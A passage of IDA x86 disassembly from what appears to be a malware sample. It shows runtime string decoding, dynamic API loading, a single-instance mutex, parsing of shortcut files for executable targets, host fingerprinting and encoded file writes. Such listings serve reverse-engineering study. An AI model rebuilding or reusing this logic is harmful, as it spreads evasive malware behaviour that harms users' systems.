call dword ptr [ebx+4]
lea eax, [ebp+var_24]
push eax
push offset dword_44C840
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
movsx eax, word_44B130
add eax, dword_44B134
sub eax, 8
cmp [ebp+var_4], eax
jnz short loc_4400CB
lea eax, [ebp+var_2C]
push eax
push offset dword_44C840
push [ebp+var_24]
push [ebp+var_20]
call sub_43C9CE
add esp, 10h
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_4400CB: ; CODE XREF: sub_43FFAA+FC�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [ebp+var_20]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_4400DD: ; CODE XREF: sub_43FFAA+BF�j
mov eax, [ebp+var_1C]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_4400E6: ; CODE XREF: sub_43FFAA+51�j
; sub_43FFAA+8A�j
xor eax, eax
jmp short loc_4400EF
; ---------------------------------------------------------------------------
loc_4400EA: ; CODE XREF: sub_43FFAA+1F�j
mov eax, 80020003h
loc_4400EF: ; CODE XREF: sub_43FFAA+13E�j
pop edi
pop esi
pop ebx
leave
retn 24h
sub_43FFAA endp
; =============== S U B R O U T I N E =======================================
sub_4400F6 proc near ; CODE XREF: sub_43F328+20�p
push edi
push offset byte_44C35D
call sub_43DF30
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B16C, eax
test eax, eax
jnz short loc_440129
push offset word_44C352
call sub_43DF30
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B16C, eax
loc_440129: ; CODE XREF: sub_4400F6+1A�j
cmp dword_44B16C, 0
jz short loc_44014F
push offset dword_44C33C
call sub_43DF30
pop ecx
push eax
push dword_44B16C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447600, eax
loc_44014F: ; CODE XREF: sub_4400F6+3A�j
pop edi
retn
sub_4400F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440151 proc near ; DATA XREF: .data:0044B23C�o
push ebp
mov ebp, esp
movsx eax, word_44B0B4
sub eax, 5
cmp ds:dword_44ABA8, eax
jbe short loc_440171
push offset dword_44ABA8
call ds:dword_445010 ; InterlockedDecrement
loc_440171: ; CODE XREF: sub_440151+13�j
mov eax, ds:dword_44ABA8
pop ebp
retn 4
sub_440151 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44017A proc near ; CODE XREF: sub_43F328:loc_43F35C�p
; sub_43FC77+27E�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 108h
push ebx
push esi
push edi
mov edi, dword_44B124
dec edi
jmp loc_44021E
; ---------------------------------------------------------------------------
loc_440192: ; CODE XREF: sub_44017A+B0�j
push offset dword_44C330
call sub_43DF30
mov [ebp+var_108], eax
push offset word_44C326
call sub_43DF30
mov esi, dword_44B0F8
movsx ebx, word_44B114
add esi, ebx
sub esi, 9
push esi
push eax
mov esi, [ebp+var_108]
push esi
lea esi, [ebp+var_FF]
push esi
call ds:dword_44A634
add esp, 18h
lea eax, [ebp+var_FF]
push eax
push 0
push 1F0001h
call ds:dword_449644 ; OpenMutexA
mov [ebp+var_104], eax
or eax, eax
jz short loc_44021D
push eax
call ds:dword_449650 ; CloseHandle
mov eax, dword_44B100
movsx edx, word_44B120
add eax, edx
sub eax, 0Ah
cmp edi, eax
jnz short loc_440216
xor eax, eax
inc eax
jmp short loc_440232
; ---------------------------------------------------------------------------
loc_440216: ; CODE XREF: sub_44017A+95�j
mov eax, 2
jmp short loc_440232
; ---------------------------------------------------------------------------
loc_44021D: ; CODE XREF: sub_44017A+79�j
inc edi
loc_44021E: ; CODE XREF: sub_44017A+13�j
movsx eax, word_44B0B8
add eax, 62h
cmp edi, eax
jb loc_440192
xor eax, eax
loc_440232: ; CODE XREF: sub_44017A+9A�j
; sub_44017A+A1�j
pop edi
pop esi
pop ebx
leave
retn
sub_44017A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440237 proc near ; DATA XREF: sub_441CEA+B�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
mov esi, [ebp+arg_8]
mov eax, offset sub_441DF8
mov [esi+0B8h], eax
mov eax, [ebp+arg_4]
mov [esi+0C4h], eax
popa
mov esp, ebp
pop ebp
xor eax, eax
retn
sub_440237 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44025A proc near ; DATA XREF: .data:0044B260�o
push ebp
mov ebp, esp
mov eax, dword_44B0C8
sub eax, 4
cmp ds:dword_447604, eax
jbe short loc_440278
push offset dword_447604
call ds:dword_445010 ; InterlockedDecrement
loc_440278: ; CODE XREF: sub_44025A+11�j
mov eax, ds:dword_447604
pop ebp
retn 4
sub_44025A endp
; =============== S U B R O U T I N E =======================================
sub_440281 proc near ; CODE XREF: sub_43F328+11�p
push edi
push offset byte_44C319
call sub_43DF30
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B160, eax
test eax, eax
jnz short loc_4402B4
push offset asc_44C30C ; "\t"
call sub_43DF30
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B160, eax
loc_4402B4: ; CODE XREF: sub_440281+1A�j
push offset byte_44C2FD
call sub_43DF30
push eax
push dword_44B160
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448250, eax
push offset byte_44C2EB
call sub_43DF30
add esp, 8
push eax
push dword_44B160
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_446120, eax
pop edi
retn
sub_440281 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4402F1 proc near ; CODE XREF: sub_43D2F7+1B3�p
; sub_43D2F7+231�p ...
var_EF38 = dword ptr -0EF38h
var_EF34 = dword ptr -0EF34h
var_EF30 = dword ptr -0EF30h
var_EF2C = byte ptr -0EF2Ch
var_EF2B = byte ptr -0EF2Bh
var_EE2C = dword ptr -0EE2Ch
var_EE24 = byte ptr -0EE24h
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 0EF38h
call sub_444C70
push ebx
push esi
push edi
movsx edi, word_44B14C
movsx esi, word_44B130
add edi, esi
imul edi, 3C0h
sub edi, 1680h
mov esi, dword_44B110
add esi, 0EA58h
add edi, esi
shl edi, 1
mov [ebp+var_EF38], edi
push edi
call sub_444BF5
add esp, 4
mov [ebp+var_EE2C], eax
movzx eax, [ebp+arg_0]
movsx edx, word_44B0F0
add edx, dword_44B138
sub edx, 6
cmp eax, edx
jnz short loc_44037D
push offset asc_44C2E0 ; "\a"
call sub_43DF30
add esp, 4
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44A634
add esp, 8
jmp loc_440477
; ---------------------------------------------------------------------------
loc_44037D: ; CODE XREF: sub_4402F1+67�j
call ds:dword_448228
mov ebx, eax
mov [ebp+var_EF2C], bl
movzx eax, [ebp+arg_0]
mov edx, dword_44B094
inc edx
add edx, dword_44B0BC
cmp eax, edx
jnz short loc_4403F1
movsx eax, word_44B0CC
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push [ebp+arg_8]
call sub_43C480
add esp, 0Ch
push offset unk_44C2B0
call sub_43DF30
add esp, 4
movzx edi, [ebp+var_EF2C]
push edi
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44A634
add esp, 10h
jmp loc_440477
; ---------------------------------------------------------------------------
loc_4403F1: ; CODE XREF: sub_4402F1+AD�j
movsx eax, word_44B108
sub eax, 5
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push dword_44B230
call sub_43C480
add esp, 0Ch
push offset word_44C252
call sub_43DF30
add esp, 4
mov edi, [ebp+arg_18]
mov esi, [ebp+arg_8]
mov ebx, edi
add ebx, esi
push ebx
push [ebp+arg_1C]
push edi
push [ebp+arg_14]
movzx edi, [ebp+var_EF2C]
push edi
mov edi, esi
sub edi, [ebp+arg_C]
mov esi, dword_44B10C
add esi, dword_44B0C4
sub esi, 3
sub edi, esi
push edi
push offset dword_448230
push [ebp+arg_10]
push [ebp+arg_20]
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44A634
add esp, 30h
loc_440477: ; CODE XREF: sub_4402F1+87�j
; sub_4402F1+FB�j
push [ebp+var_EF38]
push [ebp+var_EE2C]
movsx eax, word_44B120
add eax, dword_44B094
sub eax, 7
neg eax
push eax
lea eax, [ebp+var_EE24]
push eax
mov eax, dword_44B10C
add eax, dword_44B098
sub eax, 8
push eax
push 0
call ds:dword_44A63C ; MultiByteToWideChar
push offset dword_44C238
call sub_442838
add esp, 4
push eax
call ds:dword_445044
mov [ebp+var_EF30], eax
push [ebp+var_EE2C]
call ds:dword_445044
mov [ebp+var_EF34], eax
push eax
push [ebp+var_EF30]
mov eax, [ebp+arg_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+104h]
push [ebp+var_EF34]
call ds:dword_44ABA0
push [ebp+var_EF30]
call ds:dword_44ABA0
lea esp, [ebp-0EF44h]
pop edi
pop esi
pop ebx
leave
retn
sub_4402F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440516 proc near ; CODE XREF: sub_43BF7B+18B�p
var_12110 = byte ptr -12110h
var_1210C = word ptr -1210Ch
var_1210A = word ptr -1210Ah
var_12108 = dword ptr -12108h
var_12104 = byte ptr -12104h
var_12000 = word ptr -12000h
var_11FFE = byte ptr -11FFEh
var_1FFF = byte ptr -1FFFh
var_1FB3 = byte ptr -1FB3h
var_1FB2 = byte ptr -1FB2h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 12110h
call sub_444C70
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12104]
push eax
call sub_444C90
lea ecx, [ebp+var_12104]
or eax, 0FFFFFFFFh
loc_44053E: ; CODE XREF: sub_440516+2D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_44053E
mov ebx, dword_44B128
add ebx, 1
mov esi, eax
sub esi, ebx
mov ebx, dword_44B0DC
sub ebx, 8
mov [ebp+esi+var_12104], bl
push 0
movsx eax, word_44B090
sub eax, 2
push eax
push 3
push 0
movsx eax, word_44B0A0
sub eax, 5
push eax
push 80000001h
lea eax, [ebp+var_12104]
push eax
call ds:dword_44A788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_4407D8
push 0
lea eax, [ebp+var_12110]
push eax
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push edi
call ds:dword_445028 ; ReadFile
mov [ebp+var_12108], eax
push edi
call ds:dword_449650 ; CloseHandle
mov eax, dword_44B0AC
add eax, dword_44B094
sub eax, 2
cmp [ebp+var_12108], eax
jz loc_4407D8
cmp [ebp+var_1FFF], 4Ch
jnz loc_4407D8
movzx esi, [ebp+var_1FB3]
movzx ebx, [ebp+var_1FB2]
movzx ebx, bx
shl ebx, 8
or esi, ebx
mov [ebp+var_1210A], si
movzx eax, [ebp+var_1210A]
movsx edx, word_44B118
lea eax, [eax+edx+43h]
add eax, dword_44B104
mov [ebp+var_12000], ax
movzx eax, [ebp+var_12000]
movsx eax, [ebp+eax+var_1FFF]
movsx edx, word_44B0A4
movsx ecx, word_44B0F4
add edx, ecx
sub edx, 5
cmp eax, edx
jz loc_4407D8
movzx eax, [ebp+var_12000]
mov edx, dword_44B134
add edx, 4
add edx, dword_44B094
add eax, edx
movsx eax, [ebp+eax+var_1FFF]
movsx edx, word_44B13C
sub edx, 6
cmp eax, edx
jnz loc_4407D8
movzx eax, [ebp+var_12000]
mov edx, dword_44B0AC
add edx, 0Ah
add edx, dword_44B0A8
mov ecx, eax
add ecx, edx
movzx edx, [ebp+ecx+var_1FFF]
mov esi, dword_44B138
add esi, 7
movsx ebx, word_44B120
add esi, ebx
mov ebx, eax
add ebx, esi
movzx esi, [ebp+ebx+var_1FFF]
movzx esi, si
shl esi, 8
mov ebx, edx
or ebx, esi
mov esi, ebx
movzx esi, si
mov ebx, eax
add ebx, esi
mov esi, ebx
mov [ebp+var_1210C], si
movzx eax, [ebp+var_1210C]
lea eax, [ebp+eax+var_1FFF]
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_444C90
lea ecx, [ebp+var_11FFE]
or eax, 0FFFFFFFFh
loc_440703: ; CODE XREF: sub_440516+1F2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440703
mov edi, eax
mov eax, dword_44B0DC
movsx edx, word_44B0F4
add eax, edx
sub eax, 4
mov edx, edi
sub edx, eax
cmp [ebp+edx+var_11FFE], 2Eh
jnz short loc_44079E
mov eax, dword_44B0D0
add eax, dword_44B0F8
sub eax, 4
mov edx, edi
sub edx, eax
movsx eax, [ebp+edx+var_11FFE]
push eax
call ds:dword_445030
add esp, 4
cmp eax, 45h
jnz short loc_44079E
movsx esi, word_44B0B4
sub esi, 3
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call ds:dword_445030
add esp, 4
cmp eax, 58h
jnz short loc_44079E
movsx esi, word_44B118
sub esi, 8
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call ds:dword_445030
add esp, 4
cmp eax, 45h
jz short loc_4407A0
loc_44079E: ; CODE XREF: sub_440516+213�j
; sub_440516+23C�j ...
jmp short loc_4407D8
; ---------------------------------------------------------------------------
loc_4407A0: ; CODE XREF: sub_440516+286�j
push offset word_44C232
call sub_43DF30
push eax
lea edi, [ebp+var_11FFE]
push edi
call ds:dword_445020
movsx eax, word_44B0A0
add eax, dword_44B104
sub eax, 7
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_43B725
add esp, 14h
loc_4407D8: ; CODE XREF: sub_440516+7F�j
; sub_440516+C2�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_440516 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4407DD proc near ; CODE XREF: sub_43BAE4+26F�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4407F4
add eax, 3Fh
loc_4407F4: ; CODE XREF: sub_4407DD+12�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_43A4EC
pop ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
mov edx, dword_44B110
add edx, 34h
movsx ecx, word_44B130
add edx, ecx
mov eax, edi
add eax, edx
jge short loc_440824
add eax, 3Fh
loc_440824: ; CODE XREF: sub_4407DD+42�j
sar eax, 6
mov edi, dword_44B0D8
add edi, 3Dh
mov edx, eax
imul edx, edi
push edx
push [ebp+var_14]
call ds:dword_44502C ; RtlZeroMemory
push [ebp+arg_4]
push esi
push [ebp+var_14]
call ds:dword_449634
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_444366
mov esi, [ebp+var_14]
mov ebx, dword_44B0AC
sub ebx, 2
jmp short loc_44087C
; ---------------------------------------------------------------------------
loc_440866: ; CODE XREF: sub_4407DD+BF�j
push esi
lea eax, [ebp+var_10]
push eax
call sub_44438D
movsx eax, word_44B118
lea esi, [eax+esi+37h]
inc ebx
loc_44087C: ; CODE XREF: sub_4407DD+87�j
mov edi, [ebp+arg_4]
mov edx, dword_44B0E8
add edx, 32h
add edx, dword_44B0DC
mov eax, edi
add eax, edx
jge short loc_440897
add eax, 3Fh
loc_440897: ; CODE XREF: sub_4407DD+B5�j
sar eax, 6
cmp ebx, eax
jl short loc_440866
push [ebp+var_14]
call sub_43FF8E
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_441DDE
movsx eax, word_44B0B8
mov edx, dword_44B104
lea eax, [eax+edx+0Ch]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call ds:dword_44A648
add esp, 18h
cmp eax, dword_44B0EC
jz short loc_4408E2
xor eax, eax
inc eax
jmp short loc_4408E4
; ---------------------------------------------------------------------------
loc_4408E2: ; CODE XREF: sub_4407DD+FE�j
xor eax, eax
loc_4408E4: ; CODE XREF: sub_4407DD+103�j
pop edi
pop esi
pop ebx
leave
retn
sub_4407DD endp
; =============== S U B R O U T I N E =======================================
sub_4408E9 proc near ; DATA XREF: .data:0044B228�o
mov eax, 80004001h
retn 18h
sub_4408E9 endp
; =============== S U B R O U T I N E =======================================
sub_4408F1 proc near ; CODE XREF: sub_43F328+16�p
push edi
push offset byte_44C225
call sub_43DF30
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B164, eax
test eax, eax
jnz short loc_440924
push offset dword_44C218
call sub_43DF30
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B164, eax
loc_440924: ; CODE XREF: sub_4408F1+1A�j
push offset byte_44C205
call sub_43DF30
push eax
push dword_44B164
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44ABB4, eax
push offset byte_44C1F1
call sub_43DF30
push eax
push dword_44B164
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447620, eax
push offset byte_44C1E1
call sub_43DF30
push eax
push dword_44B164
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4470D0, eax
push offset byte_44C1CF
call sub_43DF30
push eax
push dword_44B164
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4470D8, eax
push offset dword_44C1C0
call sub_43DF30
add esp, 14h
push eax
push dword_44B164
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A644, eax
pop edi
retn
sub_4408F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4409B5 proc near ; CODE XREF: sub_442143+BA�p
; sub_442143+F3�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 2Bh
mov edx, 2FA0BE83h
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
mov ebx, edi
mov [ebp+arg_0], bl
movzx eax, [ebp+arg_0]
movsx edx, word_44B0F0
add edx, dword_44B0D4
sub edx, 5
cmp eax, edx
jnz short loc_4409FA
mov eax, 65h
jmp loc_440A82
; ---------------------------------------------------------------------------
loc_4409FA: ; CODE XREF: sub_4409B5+39�j
movzx eax, [ebp+arg_0]
movsx edx, word_44B130
sub edx, 3
cmp eax, edx
jnz short loc_440A13
mov eax, 79h
jmp short loc_440A82
; ---------------------------------------------------------------------------
loc_440A13: ; CODE XREF: sub_4409B5+55�j
movzx eax, [ebp+arg_0]
mov edx, dword_44B100
dec edx
cmp eax, edx
jnz short loc_440A29
mov eax, 75h
jmp short loc_440A82
; ---------------------------------------------------------------------------
loc_440A29: ; CODE XREF: sub_4409B5+6B�j
movzx eax, [ebp+arg_0]
mov edx, dword_44B0E8
sub edx, 3
cmp eax, edx
jnz short loc_440A41
mov eax, 69h
jmp short loc_440A82
; ---------------------------------------------------------------------------
loc_440A41: ; CODE XREF: sub_4409B5+83�j
movzx eax, [ebp+arg_0]
movsx edx, word_44B13C
movsx ecx, word_44B0B4
add edx, ecx
sub edx, 8
cmp eax, edx
jnz short loc_440A63
mov eax, 6Fh
jmp short loc_440A82
; ---------------------------------------------------------------------------
loc_440A63: ; CODE XREF: sub_4409B5+A5�j
movzx eax, [ebp+arg_0]
mov edx, dword_44B100
movsx ecx, word_44B0A4
add edx, ecx
sub edx, 3
cmp eax, edx
jnz short loc_440A82
mov eax, 61h
loc_440A82: ; CODE XREF: sub_4409B5+40�j
; sub_4409B5+5C�j ...
pop edi
pop ebx
leave
retn
sub_4409B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440A86 proc near ; CODE XREF: sub_43D966+9C�p
var_1AC = dword ptr -1ACh
var_1A8 = byte ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_198 = dword ptr -198h
var_193 = dword ptr -193h
var_18F = dword ptr -18Fh
var_18B = dword ptr -18Bh
var_187 = dword ptr -187h
var_183 = dword ptr -183h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push esi
push edi
mov edi, [ebp+arg_0]
mov byte ptr [edi], 0
mov [ebp+var_193], 94h
lea eax, [ebp+var_193]
push eax
call ds:dword_44AB98 ; GetVersionExA
cmp [ebp+var_183], 1
jnz short loc_440ACC
push offset word_44C1BA
call sub_43DF30
push eax
push edi
call ds:dword_445020
add esp, 0Ch
loc_440ACC: ; CODE XREF: sub_440A86+2F�j
cmp [ebp+var_183], 2
jnz short loc_440AEA
push offset dword_44C1B4
call sub_43DF30
push eax
push edi
call ds:dword_44A634
add esp, 0Ch
loc_440AEA: ; CODE XREF: sub_440A86+4D�j
push offset dword_44C1A8
call sub_43DF30
push [ebp+var_187]
push [ebp+var_18B]
push [ebp+var_18F]
push eax
lea esi, [ebp+var_FF]
push esi
call ds:dword_44A634
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_445020
push offset byte_44C1A1
call sub_43DF30
movsx esi, word_44B140
add esi, dword_44B0FC
sub esi, 0Ah
push esi
push 0
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_198]
push esi
push 0FFh
lea esi, [ebp+var_FF]
push esi
push eax
call ds:dword_44A614 ; GetVolumeInformationA
push offset byte_44C199
call sub_43DF30
push [ebp+var_198]
push eax
lea esi, [ebp+var_FF]
push esi
call ds:dword_44A634
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_445020
push 0FFh
lea eax, [ebp+var_FF]
push eax
mov eax, dword_44B144
add eax, 3
push eax
push 400h
call ds:dword_4475F4 ; GetLocaleInfoA
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_445020
push offset dword_44C194
call sub_43DF30
push eax
push edi
call ds:dword_445020
mov [ebp+var_1A0], 0FFh
push offset byte_44C167
call sub_43DF30
mov [ebp+var_1AC], eax
push offset asc_44C15A ; "\t"
call sub_43DF30
lea esi, [ebp+var_1A8]
push esi
lea esi, [ebp+var_1A0]
push esi
lea esi, [ebp+var_FF]
push esi
push eax
mov esi, [ebp+var_1AC]
push esi
push 80000002h
call sub_43F5B9
add esp, 70h
mov [ebp+var_1A4], eax
movsx eax, word_44B14C
add eax, dword_44B10C
sub eax, 6
cmp [ebp+var_1A4], eax
jnz short loc_440C50
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_445020
add esp, 8
loc_440C50: ; CODE XREF: sub_440A86+1B7�j
pop edi
pop esi
leave
retn
sub_440A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440C54 proc near ; DATA XREF: sub_43D966+76�o
; sub_43D966+81�o
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
movsx eax, word_44B14C
sub eax, 4
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_440C86
push offset dword_4470F0
lea eax, [ebp+var_110]
push eax
call sub_444C90
jmp short loc_440C97
; ---------------------------------------------------------------------------
loc_440C86: ; CODE XREF: sub_440C54+1D�j
push offset dword_448260
lea eax, [ebp+var_110]
push eax
call sub_444C90
loc_440C97: ; CODE XREF: sub_440C54+30�j
push 0
mov eax, dword_44B0BC
add eax, dword_44B0C8
sub eax, 5
push eax
push 4
push 0
movsx eax, word_44B0E0
add eax, dword_44B0DC
sub eax, 10h
push eax
push 40000000h
lea eax, [ebp+var_110]
push eax
call ds:dword_44A788 ; CreateFileA
mov [ebp+var_8], eax
push 2
push 0
mov eax, dword_44B0D0
movsx edx, word_44B13C
add eax, edx
sub eax, 7
push eax
push [ebp+var_8]
call ds:dword_44AB9C ; SetFilePointer
push offset word_44C152
call sub_43DF30
pop ecx
push 0
lea edx, [ebp+var_C]
push edx
movsx edx, word_44B120
movsx ecx, word_44B0E4
add edx, ecx
sub edx, 0Ah
push edx
push eax
push [ebp+var_8]
call ds:dword_44AB8C ; WriteFile
push 493E0h
push 40h
call ds:dword_447A34 ; LocalAlloc
mov ebx, eax
push 61A80h
push 40h
call ds:dword_447A34 ; LocalAlloc
mov esi, eax
mov eax, dword_44B100
sub eax, 3
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_440D5C
mov eax, [ebp+arg_0]
inc eax
push eax
push ebx
call sub_444C90
jmp short loc_440D65
; ---------------------------------------------------------------------------
loc_440D5C: ; CODE XREF: sub_440C54+F9�j
push [ebp+arg_0]
push ebx
call sub_444C90
loc_440D65: ; CODE XREF: sub_440C54+106�j
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_440D6A: ; CODE XREF: sub_440C54+11B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440D6A
mov [ebp+var_4], eax
mov edi, dword_44B0DC
sub edi, 8
jmp short loc_440DA5
; ---------------------------------------------------------------------------
loc_440D7F: ; CODE XREF: sub_440C54+154�j
movzx eax, byte ptr [ebx+edi]
mov [ebp+var_114], eax
mov eax, edi
mul edi
mov [ebp+var_118], eax
mov eax, [ebp+var_114]
mov edx, [ebp+var_118]
add eax, edx
mov [ebx+edi], al
inc edi
loc_440DA5: ; CODE XREF: sub_440C54+129�j
cmp edi, [ebp+var_4]
jb short loc_440D7F
movsx eax, word_44B12C
add eax, 61A7Ch
push eax
push esi
push [ebp+var_4]
push ebx
call sub_43C35B
add esp, 10h
mov edi, dword_44B0C8
sub edi, 4
jmp short loc_440DE4
; ---------------------------------------------------------------------------
loc_440DCF: ; CODE XREF: sub_440C54+19E�j
cmp byte ptr [esi+edi], 2Bh
jnz short loc_440DD9
mov byte ptr [esi+edi], 28h
loc_440DD9: ; CODE XREF: sub_440C54+17F�j
cmp byte ptr [esi+edi], 3Dh
jnz short loc_440DE3
mov byte ptr [esi+edi], 29h
loc_440DE3: ; CODE XREF: sub_440C54+189�j
inc edi
loc_440DE4: ; CODE XREF: sub_440C54+179�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_440DE9: ; CODE XREF: sub_440C54+19A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440DE9
cmp edi, eax
jb short loc_440DCF
movsx eax, word_44B140
movsx edx, word_44B118
add eax, edx
sub eax, 10h
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_440E35
push 0
lea eax, [ebp+var_C]
push eax
movsx eax, word_44B108
add eax, dword_44B0FC
sub eax, 7
push eax
push offset byte_44C150
push [ebp+var_8]
call ds:dword_44AB8C ; WriteFile
loc_440E35: ; CODE XREF: sub_440C54+1BA�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_440E3A: ; CODE XREF: sub_440C54+1EB�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440E3A
push 0
lea edx, [ebp+var_C]
push edx
mov edx, dword_44B0DC
movsx ecx, word_44B0A4
add edx, ecx
sub edx, 0Ch
mov edi, eax
add edi, edx
push edi
push esi
push [ebp+var_8]
call ds:dword_44AB8C ; WriteFile
push [ebp+var_8]
call ds:dword_449650 ; CloseHandle
push ebx
call ds:dword_447618 ; LocalFree
push esi
call ds:dword_447618 ; LocalFree
pop edi
pop esi
pop ebx
leave
retn
sub_440C54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440E84 proc near ; CODE XREF: sub_43CA79+11F�p
; sub_440E84+28A�p ...
var_26C = dword ptr -26Ch
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 0
call ds:dword_44A630
xor ebx, ebx
inc ebx
push offset dword_44C148
call sub_43DF30
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44A634
add esp, 14h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_448258 ; FindFirstFileA
mov [ebp+var_248], eax
movsx ecx, word_44B120
add ecx, dword_44B0C4
sub ecx, 0Bh
neg ecx
cmp eax, ecx
jnz loc_4410C8
mov eax, dword_44B0E8
add eax, dword_44B0A8
sub eax, 0Ah
cmp [ebp+arg_20], eax
ja loc_441185
movsx eax, word_44B090
mov edx, dword_44B094
lea eax, [eax+edx+3FEh]
cmp [ebp+arg_24], eax
jnb short loc_440F30
